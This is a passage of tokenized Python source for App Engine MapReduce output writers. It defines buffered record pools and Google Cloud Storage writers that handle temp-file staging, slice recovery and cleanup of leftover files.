absent or rejected. <EOL> try : <EOL> cloudstorage = None <EOL> from google . appengine . _internal import cloudstorage <EOL> if hasattr ( cloudstorage , "<STR_LIT>" ) : <EOL> cloudstorage = None <EOL> if cloudstorage : <EOL> from google . appengine . _internal . cloudstorage import cloudstorage_api <EOL> from google . appengine . _internal . cloudstorage import errors as cloud_errors <EOL> except ImportError : <EOL> pass <EOL> if cloudstorage is None : <EOL> try : <EOL> import cloudstorage <EOL> from cloudstorage import cloudstorage_api <EOL> from cloudstorage import errors as cloud_errors <EOL> except ImportError : <EOL> pass <EOL> # Counter names for bytes written and cumulative write latency (msec). <EOL> COUNTER_IO_WRITE_BYTES = "<STR_LIT>" <EOL> COUNTER_IO_WRITE_MSEC = "<STR_LIT>" <EOL> # Abstract writer lifecycle: validate -> init_job -> create (per shard) -> write -> finalize -> finalize_job, with JSON round-tripping between slices. <EOL> class OutputWriter ( json_util . JsonMixin ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> @ classmethod <EOL> def init_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ classmethod <EOL> def finalize_job ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> def to_json ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> @ classmethod <EOL> def create ( cls , mr_spec , shard_number , shard_attempt , _writer_state = None ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> def finalize ( self , ctx , shard_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % <EOL> self . __class__ ) <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( "<STR_LIT>" % cls ) <EOL> # Retry/recovery capabilities default to off; concrete writers opt in. <EOL> def _supports_shard_retry ( self , tstate ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def _supports_slice_recovery ( self , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> return False <EOL> def _recover ( self , mr_spec , shard_number , shard_attempt ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> # Flush threshold and hard cap (bytes) for buffered record pools. <EOL> _FILE_POOL_FLUSH_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> _FILE_POOL_MAX_SIZE = <NUM_LIT:1000> * <NUM_LIT> <EOL> # Extracts writer parameters from the mapper spec, supporting both the old flat layout and the nested dict layout, with optional key whitelisting. <EOL> def _get_params ( mapper_spec , allowed_keys = None , allow_old = True ) : <EOL> """<STR_LIT>""" <EOL> if "<STR_LIT>" not in mapper_spec . params : <EOL> message = ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> if not allow_old or allowed_keys : <EOL> raise errors .
BadWriterParamsError ( message ) <EOL> params = mapper_spec . params <EOL> params = dict ( ( str ( n ) , v ) for n , v in params . iteritems ( ) ) <EOL> else : <EOL> if not isinstance ( mapper_spec . params . get ( "<STR_LIT>" ) , dict ) : <EOL> raise errors . BadWriterParamsError ( <EOL> "<STR_LIT>" ) <EOL> params = mapper_spec . params . get ( "<STR_LIT>" ) <EOL> params = dict ( ( str ( n ) , v ) for n , v in params . iteritems ( ) ) <EOL> if allowed_keys : <EOL> # Any key outside the whitelist is reported as a bad writer parameter. <EOL> params_diff = set ( params . keys ( ) ) - allowed_keys <EOL> if params_diff : <EOL> raise errors . BadWriterParamsError ( <EOL> "<STR_LIT>" % "<STR_LIT:U+002C>" . join ( params_diff ) ) <EOL> return params <EOL> # Buffers appended records and flushes them in bounded batches through the subclass's _write(). <EOL> class _RecordsPoolBase ( context . Pool ) : <EOL> """<STR_LIT>""" <EOL> _RECORD_OVERHEAD_BYTES = <NUM_LIT:10> <EOL> def __init__ ( self , <EOL> flush_size_chars = _FILE_POOL_FLUSH_SIZE , <EOL> ctx = None , <EOL> exclusive = False ) : <EOL> """<STR_LIT>""" <EOL> self . _flush_size = flush_size_chars <EOL> self . _buffer = [ ] <EOL> self . _size = <NUM_LIT:0> <EOL> self . _ctx = ctx <EOL> self . _exclusive = exclusive <EOL> def append ( self , data ) : <EOL> """<STR_LIT>""" <EOL> data_length = len ( data ) <EOL> # Flush first if the new record would push the buffer past the flush threshold. <EOL> if self . _size + data_length > self . _flush_size : <EOL> self . flush ( ) <EOL> # Oversized single records are rejected unless the pool is exclusive. <EOL> if not self . _exclusive and data_length > _FILE_POOL_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" % ( data_length , _FILE_POOL_MAX_SIZE ) ) <EOL> else : <EOL> self . _buffer . append ( data ) <EOL> self . _size += data_length <EOL> if self . _size > self . _flush_size : <EOL> self . flush ( ) <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> # Serialize buffered records into an in-memory records block, then hand the bytes to _write(). <EOL> buf = cStringIO . StringIO ( ) <EOL> with records . RecordsWriter ( buf ) as w : <EOL> for record in self . _buffer : <EOL> w . write ( record ) <EOL> w . _pad_block ( ) <EOL> str_buf = buf . getvalue ( ) <EOL> buf . close ( ) <EOL> if not self . _exclusive and len ( str_buf ) > _FILE_POOL_MAX_SIZE : <EOL> raise errors . Error ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> ( _FILE_POOL_MAX_SIZE , len ( str_buf ) ) ) <EOL> start_time = time . time ( ) <EOL> self . _write ( str_buf ) <EOL> # Account bytes and elapsed msec against the mapreduce counters when a context is attached. <EOL> if self . _ctx : <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_BYTES , len ( str_buf ) ) ( self . _ctx ) <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_MSEC , <EOL> int ( ( time . time ( ) - start_time ) * <NUM_LIT:1000> ) ) ( self . _ctx ) <EOL> self . _buffer = [ ] <EOL> self . _size = <NUM_LIT:0> <EOL> gc . collect ( ) <EOL> def _write ( self , str_buf ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % type ( self ) ) <EOL> # Context-manager protocol: leaving the pool flushes whatever remains buffered. <EOL> def __enter__ ( self ) : <EOL> return self <EOL> def __exit__ ( self , atype , value , traceback ) : <EOL> self . flush ( ) <EOL> # Records pool writing to a GCS file handle; a forced flush pads up to the GCS block size and flushes the handle. <EOL> class GCSRecordsPool ( _RecordsPoolBase ) : <EOL> """<STR_LIT>""" <EOL> _GCS_BLOCK_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> def __init__ ( self , <EOL> filehandle , <EOL> flush_size_chars = _FILE_POOL_FLUSH_SIZE , <EOL> ctx = None , <EOL> exclusive = False ) : <EOL> """<STR_LIT>""" <EOL> super ( GCSRecordsPool , self ) . __init__ ( flush_size_chars , ctx , exclusive ) <EOL> self . _filehandle = filehandle <EOL> self . _buf_size = <NUM_LIT:0> <EOL> def _write ( self , str_buf ) : <EOL> """<STR_LIT>""" <EOL> self . _filehandle . write ( str_buf ) <EOL> self . _buf_size += len ( str_buf ) <EOL> def flush ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> super ( GCSRecordsPool , self ) . flush ( ) <EOL> if force : <EOL> # Zero-pad so the total written is a whole number of GCS blocks before flushing the handle. <EOL> extra_padding = self . _buf_size % self . _GCS_BLOCK_SIZE <EOL> if extra_padding > <NUM_LIT:0> : <EOL> self . _write ( "<STR_LIT:\x00>" * ( self . _GCS_BLOCK_SIZE - extra_padding ) ) <EOL> self . _filehandle . flush ( ) <EOL> # Shared GCS parameter handling for all cloud-storage writers; *_TMP_* variants allow a separate temp bucket/account. <EOL> class _GoogleCloudStorageBase ( shard_life_cycle .
_ShardLifeCycle , <EOL> OutputWriter ) : <EOL> """<STR_LIT>""" <EOL> # Parameter-name constants shared by the concrete GCS writers. <EOL> BUCKET_NAME_PARAM = "<STR_LIT>" <EOL> TMP_BUCKET_NAME_PARAM = "<STR_LIT>" <EOL> ACL_PARAM = "<STR_LIT>" <EOL> NAMING_FORMAT_PARAM = "<STR_LIT>" <EOL> CONTENT_TYPE_PARAM = "<STR_LIT>" <EOL> _ACCOUNT_ID_PARAM = "<STR_LIT>" <EOL> _TMP_ACCOUNT_ID_PARAM = "<STR_LIT>" <EOL> @ classmethod <EOL> def _get_gcs_bucket ( cls , writer_spec ) : <EOL> return writer_spec [ cls . BUCKET_NAME_PARAM ] <EOL> @ classmethod <EOL> def _get_account_id ( cls , writer_spec ) : <EOL> return writer_spec . get ( cls . _ACCOUNT_ID_PARAM , None ) <EOL> # Temp bucket/account fall back to the main ones when no TMP bucket is configured. <EOL> @ classmethod <EOL> def _get_tmp_gcs_bucket ( cls , writer_spec ) : <EOL> """<STR_LIT>""" <EOL> if cls . TMP_BUCKET_NAME_PARAM in writer_spec : <EOL> return writer_spec [ cls . TMP_BUCKET_NAME_PARAM ] <EOL> return cls . _get_gcs_bucket ( writer_spec ) <EOL> @ classmethod <EOL> def _get_tmp_account_id ( cls , writer_spec ) : <EOL> """<STR_LIT>""" <EOL> if cls . TMP_BUCKET_NAME_PARAM in writer_spec : <EOL> return writer_spec . get ( cls . _TMP_ACCOUNT_ID_PARAM , None ) <EOL> return cls . _get_account_id ( writer_spec ) <EOL> # Common naming, validation, file-opening and counter logic for the concrete GCS output writers. <EOL> class _GoogleCloudStorageOutputWriterBase ( _GoogleCloudStorageBase ) : <EOL> """<STR_LIT>""" <EOL> _DEFAULT_NAMING_FORMAT = "<STR_LIT>" <EOL> _MR_TMP = "<STR_LIT>" <EOL> _TMP_FILE_NAMING_FORMAT = ( <EOL> _MR_TMP + "<STR_LIT>" ) <EOL> # Builds the output filename via string.Template; seg_index selects the temp-file format and adds attempt/seg fields. <EOL> @ classmethod <EOL> def _generate_filename ( cls , writer_spec , name , job_id , num , <EOL> attempt = None , seg_index = None ) : <EOL> """<STR_LIT>""" <EOL> naming_format = cls . _TMP_FILE_NAMING_FORMAT <EOL> if seg_index is None : <EOL> naming_format = writer_spec . get ( cls . NAMING_FORMAT_PARAM , <EOL> cls . _DEFAULT_NAMING_FORMAT ) <EOL> template = string . Template ( naming_format ) <EOL> try : <EOL> if seg_index is None : <EOL> return template . substitute ( name = name , id = job_id , num = num ) <EOL> else : <EOL> return template . substitute ( name = name , id = job_id , num = num , <EOL> attempt = attempt , <EOL> seg = seg_index ) <EOL> # Template errors are surfaced as BadWriterParamsError so validate() fails cleanly. <EOL> except ValueError , error : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" % ( error ) ) <EOL> except KeyError , error : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( naming_format , error ) ) <EOL> # Merges the bucket name from the top-level mapper params into the writer params if absent there. <EOL> @ classmethod <EOL> def get_params ( cls , mapper_spec , allowed_keys = None , allow_old = True ) : <EOL> params = _get_params ( mapper_spec , allowed_keys , allow_old ) <EOL> if ( mapper_spec . params . get ( cls . BUCKET_NAME_PARAM ) is not None and <EOL> params . get ( cls . BUCKET_NAME_PARAM ) is None ) : <EOL> params [ cls . BUCKET_NAME_PARAM ] = mapper_spec . params [ cls . BUCKET_NAME_PARAM ] <EOL> return params <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> writer_spec = cls . get_params ( mapper_spec , allow_old = False ) <EOL> if cls . BUCKET_NAME_PARAM not in writer_spec : <EOL> raise errors . BadWriterParamsError ( <EOL> "<STR_LIT>" % <EOL> cls . BUCKET_NAME_PARAM ) <EOL> try : <EOL> cloudstorage . validate_bucket_name ( <EOL> writer_spec [ cls . BUCKET_NAME_PARAM ] ) <EOL> except ValueError , error : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" % ( error ) ) <EOL> # Dry-run both naming formats so bad templates fail at validation time. <EOL> cls . _generate_filename ( writer_spec , "<STR_LIT:name>" , "<STR_LIT:id>" , <NUM_LIT:0> ) <EOL> cls . _generate_filename ( writer_spec , "<STR_LIT:name>" , "<STR_LIT:id>" , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> # Opens a GCS file for writing in the main or temp bucket, passing through content type and ACL options. <EOL> @ classmethod <EOL> def _open_file ( cls , writer_spec , filename_suffix , use_tmp_bucket = False ) : <EOL> """<STR_LIT>""" <EOL> if use_tmp_bucket : <EOL> bucket = cls . _get_tmp_gcs_bucket ( writer_spec ) <EOL> account_id = cls . _get_tmp_account_id ( writer_spec ) <EOL> else : <EOL> bucket = cls . _get_gcs_bucket ( writer_spec ) <EOL> account_id = cls . _get_account_id ( writer_spec ) <EOL> filename = "<STR_LIT>" % ( bucket , filename_suffix ) <EOL> content_type = writer_spec . get ( cls . CONTENT_TYPE_PARAM , None ) <EOL> options = { } <EOL> if cls . ACL_PARAM in writer_spec : <EOL> options [ "<STR_LIT>" ] = writer_spec . get ( cls . ACL_PARAM ) <EOL> return cloudstorage . open ( filename , mode = "<STR_LIT:w>" , content_type = content_type , <EOL> options = options , _account_id = account_id ) <EOL> @ classmethod <EOL> def _get_filename ( cls , shard_state ) : <EOL> return shard_state . writer_state [ "<STR_LIT:filename>" ] <EOL> # Final filenames come only from shards that finished successfully. <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> filenames = [ ] <EOL> for shard in model . ShardState . find_all_by_mapreduce_state ( mapreduce_state ) : <EOL> if shard . result_status == model . ShardState . RESULT_SUCCESS : <EOL> filenames . append ( cls . _get_filename ( shard ) ) <EOL> return filenames <EOL> def _get_write_buffer ( self ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( ) <EOL> # write() funnels data into the subclass buffer and records byte/latency counters. <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> start_time = time . time ( ) <EOL> self . _get_write_buffer ( ) . write ( data ) <EOL> ctx = context . get ( ) <EOL> operation . counters . Increment ( COUNTER_IO_WRITE_BYTES , len ( data ) ) ( ctx ) <EOL> operation . counters . Increment ( <EOL> COUNTER_IO_WRITE_MSEC , int ( ( time . time ( ) - start_time ) * <NUM_LIT:1000> ) ) ( ctx ) <EOL> def _supports_shard_retry ( self , tstate ) : <EOL> return True <EOL> # Writer that streams directly to its final GCS file; optional no-duplicate mode writes numbered "-N" segment files. <EOL> class _GoogleCloudStorageOutputWriter ( _GoogleCloudStorageOutputWriterBase ) : <EOL> """<STR_LIT>""" <EOL> _SEG_PREFIX = "<STR_LIT>" <EOL> _LAST_SEG_INDEX = "<STR_LIT>" <EOL> _JSON_GCS_BUFFER = "<STR_LIT>" <EOL> _JSON_SEG_INDEX = "<STR_LIT>" <EOL> _JSON_NO_DUP = "<STR_LIT>" <EOL> _VALID_LENGTH = "<STR_LIT>" <EOL> _NO_DUPLICATE = "<STR_LIT>" <EOL> def __init__ ( self , streaming_buffer , writer_spec = None ) : <EOL> """<STR_LIT>""" <EOL> self . _streaming_buffer = streaming_buffer <EOL> self .
_no_dup = False <EOL> if writer_spec : <EOL> self . _no_dup = writer_spec . get ( self . _NO_DUPLICATE , False ) <EOL> if self . _no_dup : <EOL> # Segment index is recovered from the "-N" suffix of the buffer's filename. <EOL> self . _seg_index = int ( streaming_buffer . name . rsplit ( "<STR_LIT:->" , <NUM_LIT:1> ) [ <NUM_LIT:1> ] ) <EOL> self . _seg_valid_length = <NUM_LIT:0> <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> """<STR_LIT>""" <EOL> writer_spec = cls . get_params ( mapper_spec , allow_old = False ) <EOL> if writer_spec . get ( cls . _NO_DUPLICATE , False ) not in ( True , False ) : <EOL> raise errors . BadWriterParamsError ( "<STR_LIT>" ) <EOL> super ( _GoogleCloudStorageOutputWriter , cls ) . validate ( mapper_spec ) <EOL> def _get_write_buffer ( self ) : <EOL> return self . _streaming_buffer <EOL> # create() opens the shard's output file; in no-dup mode the first segment (index 0) is used. <EOL> @ classmethod <EOL> def create ( cls , mr_spec , shard_number , shard_attempt , _writer_state = None ) : <EOL> """<STR_LIT>""" <EOL> writer_spec = cls . get_params ( mr_spec . mapper , allow_old = False ) <EOL> seg_index = None <EOL> if writer_spec . get ( cls . _NO_DUPLICATE , False ) : <EOL> seg_index = <NUM_LIT:0> <EOL> key = cls . _generate_filename ( writer_spec , mr_spec . name , <EOL> mr_spec . mapreduce_id , <EOL> shard_number , shard_attempt , <EOL> seg_index ) <EOL> return cls . _create ( writer_spec , key ) <EOL> @ classmethod <EOL> def _create ( cls , writer_spec , filename_suffix ) : <EOL> """<STR_LIT>""" <EOL> writer = cls . _open_file ( writer_spec , filename_suffix ) <EOL> return cls ( writer , writer_spec = writer_spec ) <EOL> # State round-trip: the open GCS buffer is pickled; no-dup mode also carries the valid length and segment index. <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> writer = cls ( pickle . loads ( state [ cls . _JSON_GCS_BUFFER ] ) ) <EOL> no_dup = state . get ( cls . _JSON_NO_DUP , False ) <EOL> writer . _no_dup = no_dup <EOL> if no_dup : <EOL> writer . _seg_valid_length = state [ cls . _VALID_LENGTH ] <EOL> writer . _seg_index = state [ cls . _JSON_SEG_INDEX ] <EOL> return writer <EOL> def end_slice ( self , slice_ctx ) : <EOL> if not self . _streaming_buffer . closed : <EOL> self . _streaming_buffer . flush ( ) <EOL> def to_json ( self ) : <EOL> result = { self . _JSON_GCS_BUFFER : pickle . dumps ( self . _streaming_buffer ) , <EOL> self . _JSON_NO_DUP : self . _no_dup } <EOL> if self . _no_dup : <EOL> result . update ( { <EOL> self . _VALID_LENGTH : self . _streaming_buffer . tell ( ) , <EOL> self . _JSON_SEG_INDEX : self . _seg_index } ) <EOL> return result <EOL> # finalize: close the stream; in no-dup mode stamp the valid length into the object's metadata and record the segment prefix and last index in writer_state. <EOL> def finalize ( self , ctx , shard_state ) : <EOL> self . _streaming_buffer . close ( ) <EOL> if self . _no_dup : <EOL> cloudstorage_api . copy2 ( <EOL> self . _streaming_buffer . name , <EOL> self . _streaming_buffer . name , <EOL> metadata = { self . _VALID_LENGTH : self . _streaming_buffer . tell ( ) } ) <EOL> mr_spec = ctx . mapreduce_spec <EOL> writer_spec = self . get_params ( mr_spec . mapper , allow_old = False ) <EOL> filename = self . _generate_filename ( writer_spec , <EOL> mr_spec . name , <EOL> mr_spec . mapreduce_id , <EOL> shard_state . shard_number ) <EOL> seg_filename = self . _streaming_buffer . name <EOL> prefix , last_index = seg_filename . rsplit ( "<STR_LIT:->" , <NUM_LIT:1> ) <EOL> shard_state . writer_state = { self . _SEG_PREFIX : prefix + "<STR_LIT:->" , <EOL> self . _LAST_SEG_INDEX : int ( last_index ) , <EOL> "<STR_LIT:filename>" : filename } <EOL> else : <EOL> shard_state . writer_state = { "<STR_LIT:filename>" : self . _streaming_buffer . name } <EOL> def _supports_slice_recovery ( self , mapper_spec ) : <EOL> writer_spec = self . get_params ( mapper_spec , allow_old = False ) <EOL> return writer_spec . get ( self . _NO_DUPLICATE , False ) <EOL> # Slice recovery: close out the current segment at a consistent offset, record its valid length, and start the next segment. <EOL> def _recover ( self , mr_spec , shard_number , shard_attempt ) : <EOL> next_seg_index = self . _seg_index <EOL> if self . _seg_valid_length != <NUM_LIT:0> : <EOL> try : <EOL> gcs_next_offset = self . _streaming_buffer . _get_offset_from_gcs ( ) + <NUM_LIT:1> <EOL> # Force-close at the server-side offset if GCS has more than we think we wrote. <EOL> if gcs_next_offset > self . _streaming_buffer . tell ( ) : <EOL> self . _streaming_buffer . _force_close ( gcs_next_offset ) <EOL> else : <EOL> self . _streaming_buffer . close ( ) <EOL> except cloudstorage . FileClosedError : <EOL> pass <EOL> cloudstorage_api . copy2 ( <EOL> self . _streaming_buffer . name , <EOL> self . _streaming_buffer . name , <EOL> metadata = { self . _VALID_LENGTH : <EOL> self . _seg_valid_length } ) <EOL> next_seg_index = self . _seg_index + <NUM_LIT:1> <EOL> writer_spec = self . get_params ( mr_spec . mapper , allow_old = False ) <EOL> key = self . _generate_filename ( <EOL> writer_spec , mr_spec . name , <EOL> mr_spec . mapreduce_id , <EOL> shard_number , <EOL> shard_attempt , <EOL> next_seg_index ) <EOL> new_writer = self . _create ( writer_spec , key ) <EOL> new_writer . _seg_index = next_seg_index <EOL> return new_writer <EOL> def _get_filename_for_test ( self ) : <EOL> return self . _streaming_buffer . name <EOL> GoogleCloudStorageOutputWriter = _GoogleCloudStorageOutputWriter <EOL> # Mutable pickled state for the consistent writer: main file plus current and previous temp files. <EOL> class _ConsistentStatus ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . writer_spec = None <EOL> self . mapreduce_id = None <EOL> self . shard = None <EOL> self . mainfile = None <EOL> self . tmpfile = None <EOL> self . tmpfile_1ago = None <EOL> # Writer that stages each slice into a temp file and rewrites it into the main file, giving exactly-once output. <EOL> class GoogleCloudStorageConsistentOutputWriter ( <EOL> _GoogleCloudStorageOutputWriterBase ) : <EOL> """<STR_LIT>""" <EOL> _JSON_STATUS = "<STR_LIT:status>" <EOL> _RAND_BITS = <NUM_LIT> <EOL> _REWRITE_BLOCK_SIZE = <NUM_LIT> * <NUM_LIT> <EOL> _REWRITE_MR_TMP = "<STR_LIT>" <EOL> _TMPFILE_PATTERN = _REWRITE_MR_TMP + "<STR_LIT>" <EOL> _TMPFILE_PREFIX = _REWRITE_MR_TMP + "<STR_LIT>" <EOL> def __init__ ( self , status ) : <EOL> """<STR_LIT>""" <EOL> self . status = status <EOL> self . _data_written_to_slice = False <EOL> def _get_write_buffer ( self ) : <EOL> if not self . status . tmpfile : <EOL> raise errors . FailJobError ( <EOL> "<STR_LIT>" ) <EOL> return self . status . tmpfile <EOL> def _get_filename_for_test ( self ) : <EOL> return self . status . mainfile .
name <EOL> @ classmethod <EOL> def create ( cls , mr_spec , shard_number , shard_attempt , _writer_state = None ) : <EOL> """<STR_LIT>""" <EOL> writer_spec = cls . get_params ( mr_spec . mapper , allow_old = False ) <EOL> key = cls . _generate_filename ( writer_spec , mr_spec . name , <EOL> mr_spec . mapreduce_id , <EOL> shard_number , shard_attempt ) <EOL> status = _ConsistentStatus ( ) <EOL> status . writer_spec = writer_spec <EOL> status . mainfile = cls . _open_file ( writer_spec , key ) <EOL> status . mapreduce_id = mr_spec . mapreduce_id <EOL> status . shard = shard_number <EOL> return cls ( status ) <EOL> # Best-effort temp-file deletion: a missing file is fine. <EOL> def _remove_tmpfile ( self , filename , writer_spec ) : <EOL> if not filename : <EOL> return <EOL> account_id = self . _get_tmp_account_id ( writer_spec ) <EOL> try : <EOL> cloudstorage_api . delete ( filename , _account_id = account_id ) <EOL> except cloud_errors . NotFoundError : <EOL> pass <EOL> def _exists_in_gcs ( self , filename , _account_id = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> with cloudstorage_api . open ( filename , _account_id = _account_id ) : <EOL> return True <EOL> except cloud_errors . NotFoundError : <EOL> return False <EOL> # Streams tmpfile into mainfile in _REWRITE_BLOCK_SIZE chunks; a missing tmpfile is tolerated if the mainfile already exists. <EOL> def _rewrite_tmpfile ( self , mainfile , tmpfile , writer_spec ) : <EOL> """<STR_LIT>""" <EOL> account_id = self . _get_tmp_account_id ( writer_spec ) <EOL> try : <EOL> f = cloudstorage_api . open ( tmpfile , _account_id = account_id ) <EOL> except cloud_errors . NotFoundError : <EOL> if self . _exists_in_gcs ( mainfile . name , _account_id = account_id ) : <EOL> return <EOL> raise <EOL> data = f . read ( self . _REWRITE_BLOCK_SIZE ) <EOL> while data : <EOL> mainfile . write ( data ) <EOL> data = f . read ( self . _REWRITE_BLOCK_SIZE ) <EOL> f . close ( ) <EOL> mainfile . flush ( ) <EOL> # Temp filenames embed the job id, shard number and a random component so retries never collide. <EOL> @ classmethod <EOL> def _create_tmpfile ( cls , status ) : <EOL> """<STR_LIT>""" <EOL> tmpl = string . Template ( cls . _TMPFILE_PATTERN ) <EOL> filename = tmpl . substitute ( <EOL> id = status . mapreduce_id , shard = status . shard , <EOL> random = random . getrandbits ( cls . _RAND_BITS ) ) <EOL> return cls . _open_file ( status . writer_spec , filename , use_tmp_bucket = True ) <EOL> # begin_slice: drop the slice-before-last's temp file, fold the previous slice's temp data into the main file, clean strays, then open a fresh temp file. <EOL> def begin_slice ( self , slice_ctx ) : <EOL> status = self . status <EOL> writer_spec = status . writer_spec <EOL> if status . tmpfile_1ago : <EOL> self . _remove_tmpfile ( status . tmpfile_1ago . name , writer_spec ) <EOL> files_to_keep = [ ] <EOL> if status . tmpfile : <EOL> self . _rewrite_tmpfile ( status . mainfile , status . tmpfile . name , writer_spec ) <EOL> files_to_keep . append ( status . tmpfile . name ) <EOL> self . _try_to_clean_garbage ( <EOL> writer_spec , exclude_list = files_to_keep ) <EOL> status . tmpfile_1ago = status . tmpfile <EOL> status . tmpfile = self . _create_tmpfile ( status ) <EOL> # If the main file was already finalized, the new temp file is unnecessary -- discard it. <EOL> if status . mainfile . closed : <EOL> status . tmpfile . close ( ) <EOL> self . _remove_tmpfile ( status . tmpfile . name , writer_spec ) <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> return cls ( pickle . loads ( state [ cls . _JSON_STATUS ] ) ) <EOL> def end_slice ( self , slice_ctx ) : <EOL> self . status . tmpfile . close ( ) <EOL> def to_json ( self ) : <EOL> return { self . _JSON_STATUS : pickle . dumps ( self . status ) } <EOL> def write ( self , data ) : <EOL> super ( GoogleCloudStorageConsistentOutputWriter , self ) . write ( data ) <EOL> self . _data_written_to_slice = True <EOL> # Deletes leftover temp files for this job/shard prefix, except those explicitly excluded. <EOL> def _try_to_clean_garbage ( self , writer_spec , exclude_list = ( ) ) : <EOL> """<STR_LIT>""" <EOL> tmpl = string . Template ( self . _TMPFILE_PREFIX ) <EOL> prefix = tmpl . substitute ( <EOL> id = self . status . mapreduce_id , shard = self . status . shard ) <EOL> bucket = self . _get_tmp_gcs_bucket ( writer_spec ) <EOL> account_id = self . _get_tmp_account_id ( writer_spec ) <EOL> for f in cloudstorage . listbucket ( "<STR_LIT>" % ( bucket , prefix ) , <EOL> _account_id = account_id ) : <EOL> if f . filename not in exclude_list : <EOL> self . _remove_tmpfile ( f . filename , self . status . writer_spec ) <EOL> # finalize refuses to run if data was written this slice (it would not have been folded into the main file). <EOL> def finalize ( self , ctx , shard_state ) : <EOL> if self . _data_written_to_slice : <EOL> raise errors . FailJobError ( <EOL> "<STR_LIT>" ) <EOL> if self . status . tmpfile : <EOL> self . status . tmpfile . close ( ) <EOL> self . status . mainfile . close ( ) <EOL> if self . status . tmpfile_1ago : <EOL> self . _remove_tmpfile ( self . status . tmpfile_1ago . name , <EOL> self . status . writer_spec ) <EOL> if self . status . tmpfile : <EOL> self . _remove_tmpfile ( self . status . tmpfile . name , <EOL> self . status . writer_spec ) <EOL> self . _try_to_clean_garbage ( self . status . writer_spec ) <EOL> shard_state . writer_state = { "<STR_LIT:filename>" : self . status . mainfile . name } <EOL> # Delegating wrapper that frames written data as records (records.RecordsWriter) around an underlying GCS writer class. <EOL> class _GoogleCloudStorageRecordOutputWriterBase ( _GoogleCloudStorageBase ) : <EOL> """<STR_LIT>""" <EOL> # Concrete subclasses set WRITER_CLS to the wrapped writer class. <EOL> WRITER_CLS = None <EOL> def __init__ ( self , writer ) : <EOL> self . _writer = writer <EOL> self . _record_writer = records . RecordsWriter ( writer ) <EOL> @ classmethod <EOL> def validate ( cls , mapper_spec ) : <EOL> return cls . WRITER_CLS . validate ( mapper_spec ) <EOL> @ classmethod <EOL> def init_job ( cls , mapreduce_state ) : <EOL> return cls . WRITER_CLS . init_job ( mapreduce_state ) <EOL> @ classmethod <EOL> def finalize_job ( cls , mapreduce_state ) : <EOL> return cls . WRITER_CLS . finalize_job ( mapreduce_state ) <EOL> @ classmethod <EOL> def from_json ( cls , state ) : <EOL> return cls ( cls . WRITER_CLS . from_json ( state ) ) <EOL> def to_json ( self ) : <EOL> return self . _writer . to_json ( ) <EOL> @ classmethod <EOL> def create ( cls , mr_spec , shard_number , shard_attempt , _writer_state = None ) : <EOL> return cls ( cls . WRITER_CLS . create ( mr_spec , shard_number , shard_attempt , <EOL> _writer_state ) ) <EOL> def write ( self , data ) : <EOL> self . _record_writer . write ( data ) <EOL> def finalize ( self , ctx , shard_state ) : <EOL> return self . _writer .
finalize ( ctx , shard_state ) <EOL> @ classmethod <EOL> def get_filenames ( cls , mapreduce_state ) : <EOL> return cls . WRITER_CLS . get_filenames ( mapreduce_state ) <EOL> # Retry/recovery and slice hooks all delegate to the wrapped writer. <EOL> def _supports_shard_retry ( self , tstate ) : <EOL> return self . _writer . _supports_shard_retry ( tstate ) <EOL> def _supports_slice_recovery ( self , mapper_spec ) : <EOL> return self . _writer . _supports_slice_recovery ( mapper_spec ) <EOL> def _recover ( self , mr_spec , shard_number , shard_attempt ) : <EOL> return self . _writer . _recover ( mr_spec , shard_number , shard_attempt ) <EOL> def begin_slice ( self , slice_ctx ) : <EOL> return self . _writer . begin_slice ( slice_ctx ) <EOL> def end_slice ( self , slice_ctx ) : <EOL> # Pad the current record block before the underlying buffer is flushed/pickled. <EOL> if not self . _writer . _get_write_buffer ( ) . closed : <EOL> self . _record_writer . _pad_block ( ) <EOL> return self . _writer . end_slice ( slice_ctx ) <EOL> class 